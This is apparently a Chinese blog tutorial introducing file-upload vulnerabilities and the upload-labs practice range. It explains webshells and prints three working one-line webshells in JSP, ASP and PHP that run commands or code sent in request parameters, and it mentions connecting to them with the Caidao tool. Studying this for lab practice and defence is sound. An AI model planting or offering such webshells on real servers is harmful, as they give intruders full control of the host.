上传漏洞学习——upload-labs 闯关(一)
文章目录
- 一、漏洞介绍:
- 1、什么是文件上传漏洞:
- 2、什么样的网站会有文件上传漏洞:
- 3、文件上传漏洞的危害:
- 4、webshell介绍:
- 4.1、webshell的分类:
- 4.2、几种经典的webshell:
- 二、靶场练习
- Less-1(JS绕过)
- Less-2(文件类型绕过)
- Less-3(黑名单绕过 Apache解析)
- Less-4(.htaccess绕过)
- Less-5(大小写绕过)
- Less-6(空格绕过)
- Less-7(点绕过)
- Less-8(::$DATA绕过)
- Less-9(点+空格+点绕过)
- Less-10(双写绕过)
一、漏洞介绍:
1、什么是文件上传漏洞:
Web应用通常会有文件上传的功能,例如在 BBS 发布图片,在个人网站发布 zip 压缩包,在办公平台发布 DOC 文件等,只要 Web 应用程序允许上传文件,就有可能存在文件上传漏洞。
2、什么样的网站会有文件上传漏洞:
大部分文件上传漏洞的产生是因为 Web 应用程序没有对上传文件的格式进行严格过滤,还有一部分是攻击者通过 Web 服务器的解析漏洞来突破 Web 应用程序的防护,后面我们会讲到一些常见的解析漏洞,最后还有一些不常见的其他漏洞,如 IIS PUT漏洞等 。
3、文件上传漏洞的危害:
文件上传漏洞与 “SQL注入” 或 “XSS” 相比其风险更大,如果 Web 应用程序存在上传漏洞,攻击者甚至可以直接上传一个 webshell 到服务器上,就可以获得这个服务器的所有权限。
4、webshell介绍:
webshell 是以 asp、php、jsp 等网页文件形式存在的一种命令执行环境,也称其为一种网页后门。一般说来,当 Hacker 入侵一个网站后,会把这些 asp、php 木马的后门文件放在该网站的 Web 目录中,和正常的网页文件混杂,其命名可能和正常的文件命名很类似,让人无法第一眼通过文件名判断其为后门文件。然后就可以利用 Web 请求的方式,用 asp 或者 php 木马后门控制网站服务器,包括上传下载文件、查看数据库、执行任意程序命令等一系列操作。
4.1、webshell的分类:
根据文件大小分类:大马和小马(通常指的是一句话木马,能够使用菜刀这类工具去直接连接它)
根据脚本名称分类:jsp、asp、aspx、php
4.2、几种经典的webshell:
1、jsp的简单的webshell:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
2、asp的简单的webshell:
<%eval request("cmd")%>
3、php的简单的webshell:
php经典一句话:
<?php @eval($_POST['自定义密码']);?>
然后连接菜刀就能直接进服务器了。
上传漏洞学习——upload-labs 闯关(一)相关推荐
- DVWA靶机-文件上传漏洞(File Upload)
DVWA靶机-文件上传漏洞(File Upload) 文件上传漏洞的四个等级,low,medium,high,impossible,今天我们针对于不同的等级进行基于文件上传漏洞的攻击 DVWA靶机-暴 ...
- java 文件上传漏洞_文件上传漏洞(File Upload)
简介 File Upload,即文件上传漏洞,通常是由于对用户上传文件的类型.内容没有进行严格的过滤.检查,使得攻击者可以通过上传木马,病毒,恶意脚本等获取服务器的webshell权限,并进而攻击控制 ...
- 上传漏洞学习——upload-labs 闯关(二)
文章目录 前言: Less-11(get型 %00截断) Less-12(post型 00截断) Less-13(图片马绕过) Less-14(getimagesize检测) Less-15(exif ...
- 文件上传漏洞——upload-labs(11-20)
前言:上次文件上传漏洞学习到第十关,这次继续学习 第十一关 分析源码 前面几行代码都是对后缀名进行限制,最重要的就是这一句代码 $img_path = $_GET['save_path']." ...
- 【Web安全】中国蚁剑+DVWA(本地文件上传漏洞Upload)
文章目录 1 中国蚁剑 2 文件上传漏洞(Upload) 2.1 准备hack.php 2.2 从DVWA上传hack.php 3 使用蚁剑来连接获得webshell 1 中国蚁剑 中国蚁剑是一款开源 ...
- 文件上传漏洞——DVWA练习
前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练. 文件上传漏洞: 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向 ...
- Web安全 文件上传漏洞的 测试和利用.(上传一个图片或文件 拿下服务器最高权限.)
文件上传漏洞的概括 现在大多的网站和Web应用系统都会有上传功能(比如:文档,图片,头像,视频上传等.),而程序员在开发文件上传功能时,没有对代码做严格校验上传文件的后缀和文件类型. 此时攻击者就可以 ...
- 文件上传漏洞 (上传知识点、题型总结大全-upload靶场全解)
文件上传漏洞 什么是文件上传漏洞 什么是webshell 一句话木马大全 产生文件上传漏洞的原因 文件上传漏洞的攻击与防御方式 1.前端限制 2.检查扩展名 1.黑名单策略, 2.白名单策略 3.检查 ...
- 文件上传漏洞靶场upload-labs学习(pass1-pass5)
Upload-Labs学习 0x00 upload-labs简介 0x01 upload-labs环境搭建 0x02 Pass1(前端判断绕过) 0x03 Pass2(content-type类型绕过 ...
最新文章
- 微信小程序根据后台返回值设置自己想要的结果
- jquery操作select(增加,删除,清空)
- pytorch CrossEntropyLoss用法
- Mybatis原理分析之一:从JDBC到Mybatis
- Java中实现DES加解密的一个类
- Delphi:ADOConnection连接SQLServer自动断网问题解决
- java 1000以内的完数
- rsem比对_RSEM方法比对和表达量计算
- 7-177 输出全排列 (20 分)
- 基于matlab的电子时钟,基于LCD1602电子时钟毕业设计报告.doc
- android动画能超过父容器吗,Android中你不得不知道的动画知识 (一)
- 【Python笔记】字典
- 【英语之夜】遇见--Peter
- 如何高效学python编程_如何高效自学编程?天下没有难学的python
- mysql优化必知(mysql的语句执行顺序)
- android gps 经纬度转换,AndroidGPS获取当前经纬度坐标
- 【小程序项目开发-- 京东商城】uni-app之分类导航区域
- 列表 元组 字典的概念及其案例
- jar脱壳_[转载]脱壳再打包某梆梆免费加固APP
- 使用pandas sns绘图
热门文章
- 程序显示文本框_C++入门到精通(二),编写我们自己的Hello World程序
- 科研实习 | 北京大学计算机学院杨智老师组招收系统方向科研实习生
- 最后两周!60万奖金AI攻防赛进入冲刺(附baseline代码及实操)
- 用最简单的方式训练史上最强ResNet-50,性能超过魔改结构的ResNeSt
- 每周一起读 × 招募 | WWW 2019:基于层次化强化学习的多源搜索展示优化
- 单源最短路 Dijkstra算法 和 SPFA算法
- poj2955 Brackets 最大括号匹配 区间动态规划
- HDU 1556 前缀和 树状数组 线段树
- mysql食堂系统E R图_教务管理系统数据库E/R图
- IntelliJ IDEA快捷键学习